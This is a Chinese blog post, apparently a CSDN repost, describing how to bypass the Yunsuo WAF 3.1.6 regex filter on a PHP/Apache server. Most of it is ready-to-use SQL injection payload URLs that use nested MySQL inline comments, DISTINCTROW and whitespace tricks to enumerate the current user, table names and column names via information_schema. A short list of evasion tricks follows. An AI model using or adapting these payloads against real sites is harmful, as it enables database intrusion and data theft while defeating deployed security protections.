过云锁php大马,过云锁注入技巧 | CN-SEC 中文网

本文介绍了在Windows Server 2003上,Apache和PHP环境下,如何绕过云锁3.1.6版本的正则检查。通过利用多重内联注释和特定的SQL注入payload,如DISTINCTROW和函数间隔空格,可以避开安全防护。这些payload包括对信息表的查询,展示了攻击者可能的渗透路径。
摘要由CSDN通过智能技术生成

摘要

win03 + apache + php + 云锁最新版win_3.1.6 第一种方法就不多说了,网上很早就出来了,检测post后忽略get,从而被绕过。

这里主要介绍下如何绕过正则。

先贴payload:

ec6208d4be5bce0a84e22984a688cc09.png

环境

win03 + apache + php + 云锁最新版win_3.1.6

绕过

第一种方法就不多说了,网上很早就出来了,检测post后忽略get,从而被绕过。

这里主要介绍下如何绕过正则。

先贴payload:

https://www.0dayhack.com/test.php?id=2%27/*!40000/*!30000union*/DISTINCTROW select 1,2,3– -

https://www.0dayhack.com/test.php?id=2%27/*!40000/*!30000union*/DISTINCTROW select 1,user (),3– -

https://www.0dayhack.com/test.php?id=2%27/*!40000/*!30000union*/DISTINCTROW select/N,table_name,/Nfrom information_schema.tables where table_schema='blog' limit 1 offset 1– -

https://www.0dayhack.com/test.php?id=2%27/*!40000/*!30000union*/DISTINCTROW select/N,column_name,/Nfrom information_schema.columns where table_name='users' limit 1 offset 1– -

技巧

1. 多重内联(/*!*/)+额外关键字(DISTINCTROW)

union select => /*!40000/*!30000union*/DISTINCTROW select

2. 函数和括号间增加空白符

user() => user ()

3.

select 1,table_name,3 => select/N,table_name,/Nfrom

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值